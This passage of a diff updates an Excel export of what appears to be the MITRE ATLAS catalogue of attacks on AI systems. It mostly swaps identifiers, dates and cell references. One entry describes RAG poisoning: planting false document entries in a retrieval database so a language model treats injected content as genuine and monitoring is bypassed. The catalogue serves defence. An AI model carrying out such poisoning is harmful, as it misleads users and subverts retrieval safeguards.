+    <t>attack-pattern--6a4ccafa-0e03-5e98-b8cd-5fccc68409d4</t>
+  </si>
+  <si>
+    <t>attack-pattern--7d34fce6-1c7e-542d-9218-05a4bb7b0826</t>
+  </si>
+  <si>
+    <t>attack-pattern--ca5a090b-feaf-575d-98c6-61930fffc5b5</t>
+  </si>
+  <si>
+    <t>attack-pattern--536e5c26-d36d-583d-a441-bc259d170fab</t>
+  </si>
+  <si>
+    <t>attack-pattern--bea143b9-41d8-5b7d-a72f-7f3400010641</t>
+  </si>
+  <si>
+    <t>attack-pattern--60f738d1-1f94-5976-8cb0-ab4355b3f848</t>
+  </si>
+  <si>
+    <t>attack-pattern--bbffbb39-c270-5822-8786-7bbab1a43dc3</t>
+  </si>
+  <si>
+    <t>attack-pattern--ced5d1be-a572-58e3-bb3f-9f8c22de02b5</t>
+  </si>
+  <si>
+    <t>attack-pattern--c4bae5b7-482f-572f-b44b-6a829b186a2e</t>
+  </si>
+  <si>
+    <t>attack-pattern--07ba3218-6e26-5eed-8017-4a2e8c0cbd5d</t>
+  </si>
+  <si>
+    <t>attack-pattern--073f16fc-c4c0-5351-8a22-9c77aaaab91f</t>
+  </si>
+  <si>
+    <t>attack-pattern--e896e539-86bb-502e-8aa5-dd9630fe8337</t>
+  </si>
+  <si>
+    <t>attack-pattern--0855cdf6-5b4f-5586-a658-942b7222ede7</t>
+  </si>
+  <si>
+    <t>attack-pattern--3b83b5ba-6855-592b-82a0-9bef7c6b0c7b</t>
+  </si>
+  <si>
+    <t>attack-pattern--4480d7c5-7096-5360-8b2a-875cf4b710ea</t>
+  </si>
+  <si>
+    <t>attack-pattern--727ea6be-7237-553d-a02b-416caedc37c3</t>
+  </si>
+  <si>
+    <t>attack-pattern--3fa94ab1-4033-559a-971d-4419d0ecdcbd</t>
+  </si>
+  <si>
+    <t>attack-pattern--cd64aa83-e5e5-586c-a300-a7355666feca</t>
+  </si>
+  <si>
+    <t>attack-pattern--88ed7595-57b1-547d-8de1-436641bda943</t>
+  </si>
+  <si>
+    <t>attack-pattern--ebf8a653-b5cf-562e-be14-0cc5c0b1217a</t>
+  </si>
+  <si>
+    <t>attack-pattern--55ad0ff6-ab08-5ea5-8204-aaa28578d805</t>
+  </si>
+  <si>
+    <t>attack-pattern--491c911b-3ae5-5c7c-b81c-4fc2aceaa3a2</t>
+  </si>
+  <si>
+    <t>attack-pattern--030c4477-af33-5676-9723-1ecc6314b1ce</t>
+  </si>
+  <si>
+    <t>attack-pattern--6cc31098-f336-5fd8-932e-0289ff502d16</t>
+  </si>
+  <si>
+    <t>attack-pattern--d3d7763a-58e1-5e38-84fd-3abea967cb08</t>
+  </si>
+  <si>
+    <t>attack-pattern--d74153d6-ac3c-52fb-9847-e0a6f675cd93</t>
+  </si>
+  <si>
+    <t>attack-pattern--66188cfa-76df-546b-be79-aa06debc8d79</t>
+  </si>
+  <si>
+    <t>attack-pattern--85fed2c6-e2df-595e-88bf-f356a17cec21</t>
+  </si>
+  <si>
+    <t>attack-pattern--f13dede7-12ee-5f0e-985a-4f801aecb681</t>
+  </si>
+  <si>
+    <t>attack-pattern--ebeed0c7-c5de-5049-8f27-efcae5f88b00</t>
+  </si>
+  <si>
+    <t>attack-pattern--2093defe-1976-5bca-9c88-f63072c90073</t>
+  </si>
+  <si>
+    <t>attack-pattern--3f567912-629a-5e0b-ab0c-0102977c2d6c</t>
+  </si>
+  <si>
+    <t>attack-pattern--b8b16dac-3b95-59f7-8bf7-60e39b0c062f</t>
+  </si>
+  <si>
+    <t>attack-pattern--f39e7bd2-bebd-5d04-ba5d-5797764e0db3</t>
+  </si>
+  <si>
+    <t>attack-pattern--37f5d47b-5f1c-5831-be6d-218371ac7eb9</t>
+  </si>
+  <si>
+    <t>attack-pattern--5e652b34-b92f-5b43-afca-36f9cbf9d7c1</t>
+  </si>
+  <si>
+    <t>attack-pattern--fe09131c-0035-5e17-b1b9-1ca7b39d9611</t>
+  </si>
+  <si>
+    <t>attack-pattern--c9f8f4b0-e377-55b1-bad3-aa5f13389216</t>
+  </si>
+  <si>
+    <t>attack-pattern--fa9aa1b8-8084-569e-9253-232b0fa8d107</t>
+  </si>
+  <si>
+    <t>attack-pattern--6635775c-5539-5512-95f1-a0e085770699</t>
+  </si>
+  <si>
+    <t>attack-pattern--e0774a36-8183-5b12-a76c-492b904f32d7</t>
+  </si>
+  <si>
+    <t>attack-pattern--cb172e61-1612-58ae-a022-2ef35b237987</t>
+  </si>
+  <si>
+    <t>attack-pattern--59e47398-ebf9-5606-857a-94da5ee0079d</t>
+  </si>
+  <si>
+    <t>attack-pattern--df4da5b6-5fad-5c93-a854-be2b187d1fbc</t>
+  </si>
+  <si>
+    <t>attack-pattern--e9e0c817-539a-5977-9238-ad88d7e301a6</t>
+  </si>
+  <si>
+    <t>attack-pattern--9e0f6fd8-948c-508e-8d36-8b6517c6aaa1</t>
+  </si>
+  <si>
+    <t>attack-pattern--518338b9-9239-5e02-95f5-146bc758520f</t>
+  </si>
+  <si>
+    <t>attack-pattern--0c8eca96-8d33-5fd4-a9c0-51db41128b89</t>
+  </si>
+  <si>
+    <t>attack-pattern--9bf148ad-b901-5aeb-a029-6c0a8ce0a564</t>
+  </si>
+  <si>
+    <t>attack-pattern--6e148299-0460-5d0b-9741-467437464d3d</t>
+  </si>
+  <si>
+    <t>attack-pattern--6ff098e9-2864-579e-bebb-a0f1c92ec772</t>
+  </si>
+  <si>
+    <t>attack-pattern--dfe0aa79-7d8a-56c3-a663-74afaff00805</t>
+  </si>
+  <si>
+    <t>attack-pattern--7c3e684b-70cd-53e8-b50b-5dfae6d4b4f7</t>
+  </si>
+  <si>
+    <t>attack-pattern--8b9b393b-38ff-5d2a-9a7a-f9b6cdc4f44b</t>
+  </si>
+  <si>
+    <t>attack-pattern--ab0f8614-31f1-5014-a3e5-4520341c4933</t>
+  </si>
+  <si>
+    <t>attack-pattern--08fd47ac-8b5f-5c0b-8b1d-8e915351cdc2</t>
+  </si>
+  <si>
+    <t>attack-pattern--0bbf1c2c-1dd0-5376-8119-1ee01b910f69</t>
+  </si>
+  <si>
+    <t>attack-pattern--b8baf5c1-606b-5fb0-8dff-a360462eccf6</t>
+  </si>
+  <si>
+    <t>attack-pattern--d7874f78-a3bf-52a2-9add-428d6801be62</t>
+  </si>
+  <si>
+    <t>attack-pattern--f2826909-8806-54da-829d-1159a3526332</t>
+  </si>
+  <si>
+    <t>attack-pattern--3e837ada-a07a-5891-b801-0c75c0ffbe80</t>
+  </si>
+  <si>
+    <t>attack-pattern--1a1c3b28-eeab-52d0-87cf-4ba0a7ff687a</t>
+  </si>
+  <si>
+    <t>attack-pattern--cf1a7a78-0509-59a6-a8a4-35d9e1e966a4</t>
+  </si>
+  <si>
+    <t>attack-pattern--8a6e541e-b33f-522f-8f57-f83fd33902ea</t>
+  </si>
+  <si>
+    <t>attack-pattern--04641d66-7ecd-5b83-a3da-938e11a81254</t>
+  </si>
+  <si>
+    <t>attack-pattern--a3c78531-c795-507b-8cfd-4ad6ed57d217</t>
+  </si>
+  <si>
+    <t>attack-pattern--94e1836d-1749-5d64-8f2f-de06a218ded7</t>
+  </si>
+  <si>
+    <t>attack-pattern--c9a9741c-6c66-5456-807f-1d47140851a9</t>
+  </si>
+  <si>
+    <t>attack-pattern--855d14fa-795d-5000-9116-3b54d49f42ea</t>
+  </si>
+  <si>
+    <t>attack-pattern--065b0269-0d72-558c-a840-2012f0481f07</t>
+  </si>
+  <si>
+    <t>attack-pattern--a1494aa9-35bb-52b4-bd73-15444dc04706</t>
+  </si>
+  <si>
+    <t>attack-pattern--4f25f684-63f5-5dfa-a286-20dfbd6db4c1</t>
+  </si>
+  <si>
+    <t>attack-pattern--02ea7626-0eec-5a4b-98ff-b3f21733b783</t>
+  </si>
+  <si>
+    <t>attack-pattern--a48cde58-6c7d-5126-98b3-edc24f83b49b</t>
+  </si>
+  <si>
+    <t>attack-pattern--8f32b668-8420-5569-bbbe-f39c6b493aff</t>
+  </si>
+  <si>
+    <t>attack-pattern--7ef953bd-97c4-5fac-af50-8619601046e2</t>
+  </si>
+  <si>
+    <t>attack-pattern--c38896b2-974c-5ed5-adeb-c2477b311353</t>
+  </si>
+  <si>
+    <t>attack-pattern--d4c7f78e-4609-555c-a2eb-3d344dab3309</t>
+  </si>
+  <si>
+    <t>attack-pattern--050087b9-3411-5fbf-ba6a-74c910c6ad86</t>
+  </si>
+  <si>
+    <t>attack-pattern--ba288685-9038-5a8d-99b2-ae738e39e825</t>
+  </si>
+  <si>
+    <t>attack-pattern--5904bab7-d9b6-53fc-91b3-11f0573bbf53</t>
+  </si>
+  <si>
+    <t>attack-pattern--780c1969-4275-5327-ba93-8987888429e1</t>
+  </si>
+  <si>
+    <t>attack-pattern--0077e3e5-5405-5df5-8731-1085c5b385ae</t>
+  </si>
+  <si>
+    <t>attack-pattern--bc436fa1-27f7-5eb0-abd1-cd6760d0237b</t>
+  </si>
+  <si>
+    <t>attack-pattern--d229d87c-9400-53f0-bca3-b9514fd9227f</t>
+  </si>
+  <si>
+    <t>attack-pattern--4f36677b-3ba6-5556-9eba-0a2311796803</t>
+  </si>
+  <si>
+    <t>attack-pattern--c02f812d-59cc-5366-b1aa-7eb05154b772</t>
+  </si>
+  <si>
+    <t>attack-pattern--f36ec430-2908-5472-b19a-6e89409739dd</t>
+  </si>
+  <si>
+    <t>attack-pattern--deca63a5-2a52-54ea-abe5-2cd7089d46e4</t>
+  </si>
+  <si>
+    <t>attack-pattern--5a78e20f-c159-58bf-8dae-81d0f5f9548b</t>
+  </si>
+  <si>
+    <t>attack-pattern--d6a38c02-ad95-5958-ab29-759c0ff495ee</t>
+  </si>
+  <si>
+    <t>attack-pattern--f321adfd-7fd1-5a86-91e0-c8aa32fbe421</t>
+  </si>
+  <si>
+    <t>attack-pattern--b72ea3f4-fd80-5d95-bf47-abbfab0e813c</t>
+  </si>
+  <si>
+    <t>attack-pattern--2eeced6c-9800-55c1-a285-2a34ee79c244</t>
+  </si>
+  <si>
+    <t>attack-pattern--4b181b36-775a-5201-b19e-89b77f107d3a</t>
+  </si>
+  <si>
+    <t>attack-pattern--fc992978-dd6d-58dc-861f-c3429a75e3ee</t>
+  </si>
+  <si>
+    <t>attack-pattern--117e643b-de9e-5c83-8763-ae1df2fe25da</t>
+  </si>
+  <si>
+    <t>attack-pattern--40f3245e-8b7b-576e-b943-76a922da8521</t>
+  </si>
+  <si>
+    <t>attack-pattern--88a794e9-fa8c-5185-a677-bf476cd8890b</t>
+  </si>
+  <si>
+    <t>attack-pattern--6497a349-9403-5b0b-91ee-22537d783bd4</t>
+  </si>
+  <si>
+    <t>attack-pattern--c97ec0eb-db08-5787-89a0-0c8fc9462a83</t>
+  </si>
+  <si>
+    <t>attack-pattern--3b4f64bf-fb3a-53ee-ac26-d5783e0f9001</t>
+  </si>
+  <si>
+    <t>attack-pattern--298dc6c6-5683-5475-b724-2a2a3db3a7dc</t>
+  </si>
+  <si>
+    <t>attack-pattern--8932f230-c3b0-57eb-b6ad-0c21927963a8</t>
+  </si>
+  <si>
+    <t>attack-pattern--a5cc5062-f672-510a-8a4f-a8d1aa7f5024</t>
+  </si>
+  <si>
+    <t>attack-pattern--1b2fb3ca-e233-5cf5-8103-2b1fa37524eb</t>
+  </si>
+  <si>
+    <t>attack-pattern--dcbb91c4-3fcc-5c1b-b851-795600618124</t>
+  </si>
+  <si>
+    <t>attack-pattern--43d26237-62d6-5e56-9252-18af7c9ff7ae</t>
+  </si>
+  <si>
+    <t>attack-pattern--aac7fa8d-c943-5fec-a01f-cd4d14184395</t>
+  </si>
+  <si>
+    <t>attack-pattern--154cff1b-1e2d-5437-9ec4-1812d38c8f57</t>
+  </si>
+  <si>
+    <t>attack-pattern--ed66b442-059b-54cb-a806-620e6f8109a6</t>
+  </si>
+  <si>
+    <t>attack-pattern--8981726f-193d-5528-9adf-5e4a2cebfeab</t>
+  </si>
+  <si>
+    <t>attack-pattern--5f8f898d-1e29-52a7-bf95-2d420313aee8</t>
   </si>
   <si>
     <t>AI Agent Context Poisoning</t>
@@ -1617,7 +1617,7 @@
 System prompts can be a portion of an AI provider's competitive advantage and are thus valuable intellectual property that may be targeted by adversaries.</t>
   </si>
   <si>
-    <t>Adversaries may introduce false entries into a victim's retrieval augmented generation (RAG) database. Content designed to be interpreted as a document by the large language model (LLM) used in the RAG system is included in a data source being ingested into the RAG database. When RAG entry including the false document is retrieved the, the LLM is tricked into treating part of the retrieved content as a false RAG result. 
+    <t>Adversaries may introduce false entries into a victim's retrieval augmented generation (RAG) database. Content designed to be interpreted as a document by the large language model (LLM) used in the RAG system is included in a data source being ingested into the RAG database. When RAG entry including the false document is retrieved, the LLM is tricked into treating part of the retrieved content as a false RAG result. 
 By including a false RAG document inside of a regular RAG entry, it bypasses data monitoring tools. It also prevents the document from being deleted directly. 
 The adversary may use discovered system keywords to learn how to instruct a particular LLM to treat content as a RAG entry. They may be able to manipulate the injected entry's metadata including document title, author, and creation date.</t>
   </si>
@@ -2438,7 +2438,82 @@
     <t>https://atlas.mitre.org/techniques/AML.T0043.000</t>
   </si>
   <si>
-    <t>07 November 2025</t>
+    <t>30 September 2025</t>
+  </si>
+  <si>
+    <t>25 October 2023</t>
+  </si>
+  <si>
+    <t>13 May 2021</t>
+  </si>
+  <si>
+    <t>28 October 2025</t>
+  </si>
+  <si>
+    <t>12 March 2025</t>
+  </si>
+  <si>
+    <t>14 April 2025</t>
+  </si>
+  <si>
+    <t>28 February 2023</t>
+  </si>
+  <si>
+    <t>11 April 2024</t>
+  </si>
+  <si>
+    <t>24 January 2022</t>
+  </si>
+  <si>
+    <t>04 November 2025</t>
+  </si>
+  <si>
+    <t>16 April 2025</t>
+  </si>
+  <si>
+    <t>09 April 2025</t>
+  </si>
+  <si>
+    <t>27 October 2022</t>
+  </si>
+  <si>
+    <t>31 October 2025</t>
+  </si>
+  <si>
+    <t>15 April 2025</t>
+  </si>
+  <si>
+    <t>27 October 2025</t>
+  </si>
+  <si>
+    <t>29 October 2025</t>
+  </si>
+  <si>
+    <t>05 November 2025</t>
+  </si>
+  <si>
+    <t>13 October 2025</t>
+  </si>
+  <si>
+    <t>12 January 2024</t>
+  </si>
+  <si>
+    <t>12 October 2023</t>
+  </si>
+  <si>
+    <t>18 January 2023</t>
+  </si>
+  <si>
+    <t>17 April 2025</t>
+  </si>
+  <si>
+    <t>25 November 2025</t>
+  </si>
+  <si>
+    <t>06 November 2025</t>
+  </si>
+  <si>
+    <t>29 April 2024</t>
   </si>
   <si>
     <t>Persistence</t>
@@ -2555,52 +2630,52 @@
     <t>AML.TA0003</t>
   </si>
   <si>
-    <t>x-mitre-tactic--4feff9e4-aee4-4571-b329-bb78c5738548</t>
-  </si>
-  <si>
-    <t>x-mitre-tactic--8085216f-c5c2-4e4f-b70a-bc7d41c544e5</t>
-  </si>
-  <si>
-    <t>x-mitre-tactic--d0680b48-998e-47be-82d7-fdccb805b62a</t>
-  </si>
-  <si>
-    <t>x-mitre-tactic--dfc0b9cd-a5e0-4a05-b421-5a0e043a4726</t>
-  </si>
-  <si>
-    <t>x-mitre-tactic--0a3bc91e-01df-45b4-acf2-e9fafdb880be</t>
-  </si>
-  <si>
-    <t>x-mitre-tactic--ccdaa350-7756-4a01-a668-e2086a7681fb</t>
-  </si>
-  <si>
-    <t>x-mitre-tactic--0adbfafb-0143-46e4-b591-60ead0b8876e</t>
-  </si>
-  <si>
-    <t>x-mitre-tactic--25ecab3c-b08d-413f-a314-b1c764c84234</t>
-  </si>
-  <si>
-    <t>x-mitre-tactic--eff529c7-9491-4759-bc69-a7e40aaaba24</t>
-  </si>
-  <si>
-    <t>x-mitre-tactic--a665e54e-52b1-4cf0-9ac3-467193e291f9</t>
-  </si>
-  <si>
-    <t>x-mitre-tactic--0d9af269-8f31-4266-8b30-20424293cc4c</t>
-  </si>
-  <si>
-    <t>x-mitre-tactic--c0d63274-70df-42de-84dc-d43b6f8706c7</t>
-  </si>
-  <si>
-    <t>x-mitre-tactic--ee99e085-c667-4a96-a9eb-7da8b90cad5a</t>
-  </si>
-  <si>
-    <t>x-mitre-tactic--a8b81c1c-7483-4314-81cf-6fcdaa6587ff</t>
-  </si>
-  <si>
-    <t>x-mitre-tactic--d330c9b0-e3d4-4bd1-b943-c3a4773891a6</t>
-  </si>
-  <si>
-    <t>x-mitre-tactic--a2c31be5-5741-41f9-bbf1-f300fd33697c</t>
+    <t>x-mitre-tactic--06017740-23bb-5d05-b6d5-366ce7f5d783</t>
+  </si>
+  <si>
+    <t>x-mitre-tactic--e78b4630-6ed6-5f22-9409-f6f4fcf4e78c</t>
+  </si>
+  <si>
+    <t>x-mitre-tactic--bc075036-5189-5683-98b7-1df4bf86d242</t>
+  </si>
+  <si>
+    <t>x-mitre-tactic--a3756441-3a3a-55c3-86f6-47aec26cb412</t>
+  </si>
+  <si>
+    <t>x-mitre-tactic--cba15346-d63f-5cdd-b001-112125f9f158</t>
+  </si>
+  <si>
+    <t>x-mitre-tactic--22a483dc-1102-5fd0-94bd-b4259c537274</t>
+  </si>
+  <si>
+    <t>x-mitre-tactic--5ec2f5ad-ca32-5d36-bfb8-fad1fd429dbd</t>
+  </si>
+  <si>
+    <t>x-mitre-tactic--6be7de41-9e78-5b9e-b3cb-cd48b3e6bdfe</t>
+  </si>
+  <si>
+    <t>x-mitre-tactic--3251e0ce-df2f-517f-8866-69e6981d5d9c</t>
+  </si>
+  <si>
+    <t>x-mitre-tactic--a2fbbf3d-7e8d-5a1b-85cc-8e8fa4a76de3</t>
+  </si>
+  <si>
+    <t>x-mitre-tactic--7c7c780a-8d98-5457-bc1e-d876c111a512</t>
+  </si>
+  <si>
+    <t>x-mitre-tactic--abaefe4f-7544-5972-840d-543910eaf5ca</t>
+  </si>
+  <si>
+    <t>x-mitre-tactic--447330f2-1345-5a48-a938-877944a0ad5c</t>
+  </si>
+  <si>
+    <t>x-mitre-tactic--7507bd74-3e82-5dda-a16d-1ca38c59dd66</t>
+  </si>
+  <si>
+    <t>x-mitre-tactic--8d151547-7423-5bac-bc2d-a6fd02afba29</t>
+  </si>
+  <si>
+    <t>x-mitre-tactic--39099d7c-9fb7-5836-8e8a-9f6b594bf01b</t>
   </si>
   <si>
     <t>Privilege Escalation</t>
@@ -2851,100 +2926,100 @@
     <t>AML.M0016</t>
   </si>
   <si>
-    <t>course-of-action--66662d10-2079-45da-a850-8b29aa0ff90a</t>
-  </si>
-  <si>
-    <t>course-of-action--26a9b3d1-0c48-415f-a011-1b864defc455</t>
-  </si>
-  <si>
-    <t>course-of-action--081d6d9e-aecf-46f3-b035-0253b8d1501f</t>
-  </si>
-  <si>
-    <t>course-of-action--32caa8ed-49bc-4485-b068-838e97a772dc</t>
-  </si>
-  <si>
-    <t>course-of-action--c643d9f7-525f-4c21-bf6e-4b577c75484d</t>
-  </si>
-  <si>
-    <t>course-of-action--7330b481-cb73-4100-b533-1135c440ecdb</t>
-  </si>
-  <si>
-    <t>course-of-action--dc781da8-1943-49ea-8f8c-a0c0a86f5f5c</t>
-  </si>
-  <si>
-    <t>course-of-action--40a562b5-8795-4064-99ea-2e77d11a87d3</t>
-  </si>
-  <si>
-    <t>course-of-action--94ba89e5-060a-4aa9-8805-a874d2a63644</t>
-  </si>
-  <si>
-    <t>course-of-action--3fec7122-a13d-436a-abd8-f988abafad4d</t>
-  </si>
-  <si>
-    <t>course-of-action--a1ba8096-3f60-4429-a2f9-93134c913f2f</t>
-  </si>
-  <si>
-    <t>course-of-action--11d3600c-6e97-4c8e-ace6-258abb52bf5e</t>
-  </si>
-  <si>
-    <t>course-of-action--6a80465b-491d-4456-8a1c-dad1f6084073</t>
-  </si>
-  <si>
-    <t>course-of-action--6bef67bf-7cb7-459e-8d8c-f998960fc931</t>
-  </si>
-  <si>
-    <t>course-of-action--0eb2eed7-21fb-4c0e-bc05-f70d08af6cdd</t>
-  </si>
-  <si>
-    <t>course-of-action--e4e9faf1-8700-4aa8-8967-b87c4b64a373</t>
-  </si>
-  <si>
-    <t>course-of-action--59f1f2f3-4d14-419a-b3c4-954f966e5896</t>
-  </si>
-  <si>
-    <t>course-of-action--5d04760c-107b-429a-81e0-338ea6b74160</t>
-  </si>
-  <si>
-    <t>course-of-action--4aff65a9-0850-4f32-bb40-26a37145a218</t>
-  </si>
-  <si>
-    <t>course-of-action--3e3e763d-2a04-47e0-bfa6-848701bcab8b</t>
-  </si>
-  <si>
-    <t>course-of-action--7dfca9f9-9bac-43b9-a0cd-7931a854d3f0</t>
-  </si>
-  <si>
-    <t>course-of-action--1d986476-d01e-4eff-a89b-e91edcc3c171</t>
-  </si>
-  <si>
-    <t>course-of-action--020228f8-2cea-4f5b-b589-38b609184f49</t>
-  </si>
-  <si>
-    <t>course-of-action--325643c8-75d3-497b-bef6-5b0cda2a6e66</t>
-  </si>
-  <si>
-    <t>course-of-action--eba11b22-421b-4e1b-aeab-2676b69e81ca</t>
-  </si>
-  <si>
-    <t>course-of-action--41323eda-f2a5-400c-9b20-cf5569bd1ef1</t>
-  </si>
-  <si>
-    <t>course-of-action--1a60c9bc-21a5-4dfe-9efd-c65aa3982fe1</t>
-  </si>
-  <si>
-    <t>course-of-action--ffe6e5df-5a6c-4b9a-8cc8-bef149efca4c</t>
-  </si>
-  <si>
-    <t>course-of-action--b1540dea-06f7-408e-aa46-f62fb5ca9d74</t>
-  </si>
-  <si>
-    <t>course-of-action--c4c7044f-4f3e-42ba-a6d9-ebeedbdaf766</t>
-  </si>
-  <si>
-    <t>course-of-action--279ebf5a-bba3-4fca-80be-de230fe98966</t>
-  </si>
-  <si>
-    <t>course-of-action--c9576e37-7d87-40f2-b446-f82bb77452e6</t>
+    <t>course-of-action--70836747-6dd7-52ee-82a8-547def5d2c6c</t>
+  </si>
+  <si>
+    <t>course-of-action--816f193f-8d87-5199-bc54-107b74f283c3</t>
+  </si>
+  <si>
+    <t>course-of-action--3c7d2fc8-7b70-54d5-b722-2a5c9292f88a</t>
+  </si>
+  <si>
+    <t>course-of-action--1f45c127-eb18-5e17-a136-28ceef04edec</t>
+  </si>
+  <si>
+    <t>course-of-action--20c3de3a-045a-5c5d-883b-4bb074cc427e</t>
+  </si>
+  <si>
+    <t>course-of-action--0fd2a106-347e-51b2-8c78-2fdd4b091548</t>
+  </si>
+  <si>
+    <t>course-of-action--1fc2879c-d3c3-5dbf-882d-4ca4721f30d4</t>
+  </si>
+  <si>
+    <t>course-of-action--9ae01d8c-c75b-5d11-944f-16edbb7d754f</t>
+  </si>
+  <si>
+    <t>course-of-action--33f3432f-83e7-5d59-924c-ed2b817c2214</t>
+  </si>
+  <si>
+    <t>course-of-action--eae4dfbe-1a12-5a2e-bad8-d5adbbf39cb6</t>
+  </si>
+  <si>
+    <t>course-of-action--4f43e1d3-1198-56e6-91ac-654ee9972acd</t>
+  </si>
+  <si>
+    <t>course-of-action--5af67059-b0e6-5e35-b3d6-ef4f2a46a559</t>
+  </si>
+  <si>
+    <t>course-of-action--215593c6-9371-51f0-997a-9080c6786b2a</t>
+  </si>
+  <si>
+    <t>course-of-action--1c8b96b0-c21f-5a9b-b478-ddd9ac40f686</t>
+  </si>
+  <si>
+    <t>course-of-action--68a1c707-b05e-5588-b0a3-01aa35182ed0</t>
+  </si>
+  <si>
+    <t>course-of-action--c35b59f9-60f8-5bd1-ad76-9cbb549a97ce</t>
+  </si>
+  <si>
+    <t>course-of-action--beae4fe4-c289-5c57-b8b9-6febb24d5c9a</t>
+  </si>
+  <si>
+    <t>course-of-action--689cbf83-609f-55ce-95d6-9d05df6da1f4</t>
+  </si>
+  <si>
+    <t>course-of-action--e3e2c4e7-ecc1-5e0b-a276-9b00c0b30204</t>
+  </si>
+  <si>
+    <t>course-of-action--8aaa7934-9c52-56f0-a48d-1f5258e4288b</t>
+  </si>
+  <si>
+    <t>course-of-action--08ed40a8-34fb-59c1-a889-c4dafa4bc134</t>
+  </si>
+  <si>
+    <t>course-of-action--ca58e864-8980-5b45-a405-093d6803ad97</t>
+  </si>
+  <si>
+    <t>course-of-action--94cf1dc2-512c-5d81-b073-891d7113c194</t>
+  </si>
+  <si>
+    <t>course-of-action--1b15d839-8893-5005-aba7-62c3cc8b48ac</t>
+  </si>
+  <si>
+    <t>course-of-action--aba79819-27d3-5204-9fed-011613fa8136</t>
+  </si>
+  <si>
+    <t>course-of-action--5537712b-0001-5d3a-b12f-041d78a837a7</t>
+  </si>
+  <si>
+    <t>course-of-action--0f15844f-7146-5bcd-8787-4e6f688f9a2c</t>
+  </si>
+  <si>
+    <t>course-of-action--6c1c5f7a-986c-5c1f-ac9b-bde692d0b3fe</t>
+  </si>
+  <si>
+    <t>course-of-action--291b6312-52da-583e-bebe-bbc4cb40db4a</t>
+  </si>
+  <si>
+    <t>course-of-action--b1132427-33bb-5055-9e86-9df87ad144e7</t>
+  </si>
+  <si>
+    <t>course-of-action--bf670d38-5978-5e5e-ba61-9b61dbc70122</t>
+  </si>
+  <si>
+    <t>course-of-action--c578b076-802d-50d7-9d88-25d62ea569c8</t>
   </si>
   <si>
     <t>AI Agent Tools Permissions Configuration</t>
@@ -3260,6 +3335,15 @@
   </si>
   <si>
     <t>https://atlas.mitre.org/mitigations/AML.M0016</t>
+  </si>
+  <si>
+    <t>12 April 2023</t>
+  </si>
+  <si>
+    <t>13 August 2025</t>
+  </si>
+  <si>
+    <t>21 April 2025</t>
   </si>
 </sst>
 </file>
@@ -3723,13 +3807,13 @@
         <v>709</v>
       </c>
       <c r="G2" t="s">
-        <v>709</v>
+        <v>727</v>
       </c>
       <c r="H2" t="s">
-        <v>710</v>
+        <v>735</v>
       </c>
       <c r="I2" t="s">
-        <v>731</v>
+        <v>756</v>
       </c>
     </row>
     <row r="3" spans="1:9">
@@ -3749,16 +3833,16 @@
         <v>570</v>
       </c>
       <c r="F3" t="s">
-        <v>709</v>
+        <v>710</v>
       </c>
       <c r="G3" t="s">
-        <v>709</v>
+        <v>718</v>
       </c>
       <c r="H3" t="s">
-        <v>711</v>
+        <v>736</v>
       </c>
       <c r="I3" t="s">
-        <v>731</v>
+        <v>756</v>
       </c>
     </row>
     <row r="4" spans="1:9">
@@ -3784,10 +3868,10 @@
         <v>709</v>
       </c>
       <c r="H4" t="s">
-        <v>712</v>
+        <v>737</v>
       </c>
       <c r="I4" t="s">
-        <v>731</v>
+        <v>756</v>
       </c>
     </row>
     <row r="5" spans="1:9">
@@ -3807,16 +3891,16 @@
         <v>572</v>
       </c>
       <c r="F5" t="s">
-        <v>709</v>
+        <v>711</v>
       </c>
       <c r="G5" t="s">
-        <v>709</v>
+        <v>720</v>
       </c>
       <c r="H5" t="s">
-        <v>712</v>
+        <v>737</v>
       </c>
       <c r="I5" t="s">
-        <v>731</v>
+        <v>756</v>
       </c>
     </row>
     <row r="6" spans="1:9">
@@ -3836,16 +3920,16 @@
         <v>573</v>
       </c>
       <c r="F6" t="s">
-        <v>709</v>
+        <v>711</v>
       </c>
       <c r="G6" t="s">
-        <v>709</v>
+        <v>720</v>
       </c>
       <c r="H6" t="s">
-        <v>713</v>
+        <v>738</v>
       </c>
       <c r="I6" t="s">
-        <v>731</v>
+        <v>756</v>
       </c>
     </row>
     <row r="7" spans="1:9">
@@ -3865,16 +3949,16 @@
         <v>574</v>
       </c>
       <c r="F7" t="s">
-        <v>709</v>
+        <v>711</v>
       </c>
       <c r="G7" t="s">
-        <v>709</v>
+        <v>720</v>
       </c>
       <c r="H7" t="s">
-        <v>714</v>
+        <v>739</v>
       </c>
       <c r="I7" t="s">
-        <v>731</v>
+        <v>756</v>
       </c>
     </row>
     <row r="8" spans="1:9">
@@ -3894,16 +3978,16 @@
         <v>575</v>
       </c>
       <c r="F8" t="s">
-        <v>709</v>
+        <v>711</v>
       </c>
       <c r="G8" t="s">
-        <v>709</v>
+        <v>713</v>
       </c>
       <c r="H8" t="s">
-        <v>715</v>
+        <v>740</v>
       </c>
       <c r="I8" t="s">
-        <v>731</v>
+        <v>756</v>
       </c>
     </row>
     <row r="9" spans="1:9">
@@ -3923,16 +4007,16 @@
         <v>576</v>
       </c>
       <c r="F9" t="s">
-        <v>709</v>
+        <v>711</v>
       </c>
       <c r="G9" t="s">
-        <v>709</v>
+        <v>720</v>
       </c>
       <c r="H9" t="s">
-        <v>716</v>
+        <v>741</v>
       </c>
       <c r="I9" t="s">
-        <v>731</v>
+        <v>756</v>
       </c>
     </row>
     <row r="10" spans="1:9">
@@ -3952,16 +4036,16 @@
         <v>577</v>
       </c>
       <c r="F10" t="s">
-        <v>709</v>
+        <v>711</v>
       </c>
       <c r="G10" t="s">
-        <v>709</v>
+        <v>720</v>
       </c>
       <c r="H10" t="s">
-        <v>716</v>
+        <v>741</v>
       </c>
       <c r="I10" t="s">
-        <v>731</v>
+        <v>756</v>
       </c>
     </row>
     <row r="11" spans="1:9">
@@ -3981,16 +4065,16 @@
         <v>578</v>
       </c>
       <c r="F11" t="s">
-        <v>709</v>
+        <v>711</v>
       </c>
       <c r="G11" t="s">
-        <v>709</v>
+        <v>720</v>
       </c>
       <c r="H11" t="s">
-        <v>715</v>
+        <v>740</v>
       </c>
       <c r="I11" t="s">
-        <v>731</v>
+        <v>756</v>
       </c>
     </row>
     <row r="12" spans="1:9">
@@ -4010,16 +4094,16 @@
         <v>579</v>
       </c>
       <c r="F12" t="s">
-        <v>709</v>
+        <v>711</v>
       </c>
       <c r="G12" t="s">
-        <v>709</v>
+        <v>713</v>
       </c>
       <c r="H12" t="s">
-        <v>713</v>
+        <v>738</v>
       </c>
       <c r="I12" t="s">
-        <v>731</v>
+        <v>756</v>
       </c>
     </row>
     <row r="13" spans="1:9">
@@ -4039,16 +4123,16 @@
         <v>580</v>
